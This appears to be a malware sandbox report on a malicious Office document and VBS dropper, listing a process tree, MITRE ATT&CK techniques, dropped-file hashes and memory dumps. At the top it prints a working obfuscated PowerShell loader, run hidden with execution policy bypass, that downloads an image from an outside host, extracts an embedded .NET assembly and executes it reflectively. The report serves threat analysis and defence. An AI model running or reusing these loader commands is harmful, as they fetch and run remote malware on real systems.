⪤HM∽ ´ ⺴ ⎰ ⪤ZQ∽ ´ ⺴ ⎰ ⪤2∽ ´ ⺴ ⎰ ⪤DQ∽ ´ ⺴ ⎰ ⪤T∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤ZwB0∽ ´ ⺴ ⎰ ⪤Gg∽ ´ ⺴ ⎰ ⪤KQ∽ ´ ⺴ ⎰ ⪤7∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤YwBv∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤bQBh∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤BC∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤9∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤WwBT∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤cwB0∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bQ∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤EM∽ ´ ⺴ ⎰ ⪤bwBu∽ ´ ⺴ ⎰ ⪤HY∽ ´ ⺴ ⎰ ⪤ZQBy∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤XQ∽ ´ ⺴ ⎰ ⪤6∽ ´ ⺴ ⎰ ⪤Do∽ ´ ⺴ ⎰ ⪤RgBy∽ ´ ⺴ ⎰ ⪤G8∽ ´ ⺴ ⎰ ⪤bQBC∽ ´ ⺴ ⎰ ⪤GE∽ ´ ⺴ ⎰ ⪤cwBl∽ ´ ⺴ ⎰ ⪤DY∽ ´ ⺴ ⎰ ⪤N∽ ´ ⺴ ⎰ ⪤BT∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤cgBp∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Zw∽ ´ ⺴ ⎰ ⪤o∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤YgBh∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤ZQ∽ ´ ⺴ ⎰ ⪤2∽ ´ ⺴ ⎰ ⪤DQ∽ ´ ⺴ ⎰ ⪤QwBv∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤bQBh∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤p∽ ´ ⺴ ⎰ ⪤Ds∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤Bs∽ ´ ⺴ ⎰ ⪤G8∽ ´ ⺴ ⎰ ⪤YQBk∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤BB∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤cwBl∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤YgBs∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤9∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤WwBT∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤cwB0∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bQ∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤FI∽ ´ ⺴ ⎰ ⪤ZQBm∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤ZQBj∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤aQBv∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤LgBB∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤cwBl∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤YgBs∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤XQ∽ ´ ⺴ ⎰ ⪤6∽ ´ ⺴ ⎰ ⪤Do∽ ´ ⺴ ⎰ ⪤T∽ ´ ⺴ ⎰ ⪤Bv∽ ´ ⺴ ⎰ ⪤GE∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤o∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤YwBv∽ ´ ⺴ ⎰ ⪤G0∽ ´ ⺴ ⎰ ⪤bQBh∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤BC∽ ´ ⺴ ⎰ ⪤Hk∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤KQ∽ ´ ⺴ ⎰ ⪤7∽ ´ ⺴ ⎰ ⪤CQ∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤B5∽ ´ ⺴ ⎰ ⪤H∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤ZQ∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤D0∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤bwBh∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤ZQBk∽ ´ ⺴ ⎰ ⪤EE∽ ´ ⺴ ⎰ ⪤cwBz∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤bQBi∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤eQ∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤Ec∽ ´ ⺴ ⎰ ⪤ZQB0∽ ´ ⺴ ⎰ ⪤FQ∽ ´ ⺴ ⎰ ⪤eQBw∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤K∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤bgBs∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤Yg∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤Ek∽ ´ ⺴ ⎰ ⪤Tw∽ ´ ⺴ ⎰ ⪤u∽ ´ ⺴ ⎰ ⪤Eg∽ ´ ⺴ ⎰ ⪤bwBt∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤Jw∽ ´ ⺴ ⎰ ⪤p∽ ´ ⺴ ⎰ ⪤Ds∽ ´ ⺴ ⎰ ⪤J∽ ´ ⺴ ⎰ ⪤Bt∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bo∽ ´ ⺴ ⎰ ⪤G8∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤D0∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤eQBw∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤LgBH∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤BN∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤Bo∽ ´ ⺴ ⎰ ⪤G8∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤o∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤VgBB∽ ´ ⺴ ⎰ ⪤Ek∽ ´ ⺴ ⎰ ⪤Jw∽ ´ ⺴ ⎰ ⪤p∽ ´ ⺴ ⎰ ⪤C4∽ ´ ⺴ ⎰ ⪤SQBu∽ ´ ⺴ ⎰ ⪤HY∽ ´ ⺴ ⎰ ⪤bwBr∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤K∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤k∽ ´ ⺴ ⎰ ⪤G4∽ ´ ⺴ ⎰ ⪤dQBs∽ ´ ⺴ ⎰ ⪤Gw∽ ´ ⺴ ⎰ ⪤L∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤Fs∽ ´ ⺴ ⎰ ⪤bwBi∽ ´ ⺴ ⎰ ⪤Go∽ ´ ⺴ ⎰ ⪤ZQBj∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤WwBd∽ ´ ⺴ ⎰ ⪤F0∽ ´ ⺴ ⎰ ⪤I∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤o∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤d∽ ´ ⺴ ⎰ ⪤B4∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤LgBG∽ ´ ⺴ ⎰ ⪤EY∽ ´ ⺴ ⎰ ⪤VwBT∽ ´ ⺴ ⎰ ⪤C8∽ ´ ⺴ ⎰ ⪤N∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤y∽ ´ ⺴ ⎰ ⪤DI∽ ´ ⺴ ⎰ ⪤Lw∽ ´ ⺴ ⎰ ⪤w∽ ´ ⺴ ⎰ ⪤DU∽ ´ ⺴ ⎰ ⪤Lg∽ ´ ⺴ ⎰ ⪤5∽ ´ ⺴ ⎰ ⪤Dg∽ ´ ⺴ ⎰ ⪤Lg∽ ´ ⺴ ⎰ ⪤w∽ ´ ⺴ ⎰ ⪤Dk∽ ´ ⺴ ⎰ ⪤Lg∽ ´ ⺴ ⎰ ⪤1∽ ´ ⺴ ⎰ ⪤DQ∽ ´ ⺴ ⎰ ⪤Lw∽ ´ ⺴ ⎰ ⪤v∽ ´ ⺴ ⎰ ⪤Do∽ ´ ⺴ ⎰ ⪤c∽ ´ ⺴ ⎰ ⪤B0∽ ´ ⺴ ⎰ ⪤HQ∽ ´ ⺴ ⎰ ⪤a∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤L∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤YQB0∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤dgBh∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤bw∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤L∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤YQB0∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤dgBh∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤bw∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤C∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤L∽ ´ ⺴ ⎰ ⪤∽ ´ ⺴ ⎰ ⪤g∽ ´ ⺴ ⎰ ⪤Cc∽ ´ ⺴ ⎰ ⪤Z∽ ´ ⺴ ⎰ ⪤Bl∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤YQB0∽ ´ ⺴ ⎰ ⪤Gk∽ ´ ⺴ ⎰ ⪤dgBh∽ ´ ⺴ ⎰ ⪤GQ∽ ´ ⺴ ⎰ ⪤bw∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤Cw∽ ´ ⺴ ⎰ ⪤JwBS∽ ´ ⺴ ⎰ ⪤GU∽ ´ ⺴ ⎰ ⪤ZwBB∽ ´ ⺴ ⎰ ⪤HM∽ ´ ⺴ ⎰ ⪤bQ∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤Cw∽ ´ ⺴ ⎰ ⪤Jw∽ ´ ⺴ ⎰ ⪤n∽ ´ ⺴ ⎰ ⪤Ck∽ ´ ⺴ ⎰ ⪤KQ∽ ´ ⺴ ⎰ ⪤=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('∽ ´ ⺴ ⎰ ⪤','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FFWS/422/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
c7943d7e3a0e300dc310d5181518479a

SHA1
3737934021ee247e747f3d5c97ef76f416b70376

SHA256
ca98716ca7d181b8393f11da6368337897e9b6426fd8698ce4ef9f9789a8a98b

SHA512
211d7b2d2158c312f0e377d7a882a53845eea790df9c58b2b94483d8707d944c0912ff18f848b042429f0704ac22a11150a6276ac21e6e5295a633e97ee45570

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
30069f6d3733050554336dfe9479aaf9

SHA1
1af9e63c4f72233403f589c8eda1d6f2fa95a1db

SHA256
c1659b44bef2f796e4d449983fdd3b2035ebd993697763e7abaec6cc96223743

SHA512
67d2164b3ab659f4206df08af3ca82551da53d2f23e90f01547e82a2a086dd8ea8e507883276145002c8244542be319fd28650a2e7492cedb4190bd2700ba2c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{86DB684F-C4A4-4709-B11A-1DAC658E8DAE}.FSD

Filesize
128KB

MD5
201c1e529dd0b4c64c4d03b24e63eb09

SHA1
1902b916ee64d20afc57f10f150c31be35b29bf9

SHA256
fe93f1669bbd21600dbddb0c942cba61d3834a8096772d5c4c39b6af01f2b2ea

SHA512
56d417c5b4c0e40df406ba6229525b314f4de024e4a801be5910a4b9b350a28cad1a8fec9058fe7d6f7e39ccf295a759c61637893121ba7e4600d3814448a054

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
3c0d338288d59e154a48fadfb7ef3823

SHA1
4c849e359508a743c9792d7cca0a626cfc781fe3

SHA256
b262893c861b6339c1a562de4d0d405bad2d3b3ac27a07c142c8ff124bf0b32a

SHA512
09d3f6c8cf0e3fb1ebc133c7a141c409e620ff79994ab26b5a83bd361a49d2d79c82a88f579bab38c2f54d15921b7e357f5444e90a3e439a7f68b830f739ea5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C4B92A3A-BD1F-4F64-A3C3-98E69DBDA62B}.FSD

Filesize
128KB

MD5
32ea0fa5afd34d15dad40d7bfa7efdf9

SHA1
08b82e7317308185ff5151324ec9b6533f3ed1de

SHA256
8f6a1daf430813148fd972807e2d8b93766d2da33c2ffdd4f4e3072692bc5b14

SHA512
75a7512646af8fcabf7f5bac714fc8d8c209e8fba84ddfe5f212132ec6049d90057beaeb1b0b5a9ebef4a4bb513e6b137c6c446448463ca3e26474c87cc61c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\yummybuttercakeaddedchocolatewithsugarandotherthingswhichmakecakewillbehappyentireprocesshappeneingwithnew___yummybuttercakebun[1].doc

Filesize
88KB

MD5
ce3b08f58d579862f5b03bb1f563f9f9

SHA1
aa9339e51447b2766306991a1b7c489b483da9ea

SHA256
3d7634a57671a2cb7c21f514374d28280fc3708f114ab73e0593ac911111e882

SHA512
327fac685fcd6d53aa7ac2ec854f3b4b7f8f2b7f47632948a931a098ea19607d3dfe58d36dc35024b8da468c82eedb855a2619328b82b81a7835ee72b1197308

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD5D6.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{F1CB4BD5-E713-4429-92B7-D3719DCCCB5A}

Filesize
128KB

MD5
a7dd4ca1b2b84289043f26f6a58df6cf

SHA1
8ebfe03fbfdad5553b1365058f6f2a671ff71875

SHA256
a9f55bf4c6f6dad09938c7c27caada1ba44588a08e16f5e4587df2891306c3ac

SHA512
9636da8831073fa6df55aa4fe65df7414755d05c3b988af6b0e02844f322f59f7103952dd3701d47ae724196d8b694947c535c777ad760b79b08a01470ce608d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
f941948966c49f75f4b8eb45802bb5fa

SHA1
9fe6024a57e8e3acca49cdf52e1774cfef21330f

SHA256
0ad7d3662dc57284605646f325bce3e125588a870bf664ae6c7e1cc19ee6574d

SHA512
6d45d1aeab736468d0a5bd01ae3e5c3ed0cd57b0d3c9419f1a68813b3a90c685f3537d6f7feabc5283b30fdc26ce8276007b3a8c0b05da1f58c32a2e9e7f459f

Download Submit
C:\Users\Admin\AppData\Roaming\mugcackecholocatebutterburnm.vBS

Filesize
178KB

MD5
f5f4974a1897bc2d46696e9cfb83ac43

SHA1
5169b65fead4ef2075475abbe3eddb0c7cbbdaed

SHA256
72dbcb6ba6be6d108170765bfb0adb973f245c8eb7504ac39d379ea3f7933468

SHA512
39b340df65c4ae9a0d68caf70b09e9b4e5bdc0538e77369c4c4e0671d24b086299490ca9cbf5cdbfe5ffb271121c100494b4f32374e88f75b786ef99b13e7386

Download Submit
memory/2176-20-0x0000000003DF0000-0x0000000003DF2000-memory.dmp

Filesize
8KB

Download
memory/2176-18-0x000000007231D000-0x0000000072328000-memory.dmp

Filesize
44KB

Download
memory/2176-16-0x000000002F701000-0x000000002F702000-memory.dmp

Filesize
4KB

Download
memory/2176-121-0x000000007231D000-0x0000000072328000-memory.dmp

Filesize
44KB

Download
memory/2176-135-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2176-136-0x000000007231D000-0x0000000072328000-memory.dmp

Filesize
44KB

Download
memory/2548-1-0x000000007231D000-0x0000000072328000-memory.dmp

Filesize
44KB

Download
memory/2548-97-0x000000007231D000-0x0000000072328000-memory.dmp

Filesize
44KB

Download
memory/2548-21-0x0000000001F80000-0x0000000001F82000-memory.dmp

Filesize
8KB

Download
memory/2548-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download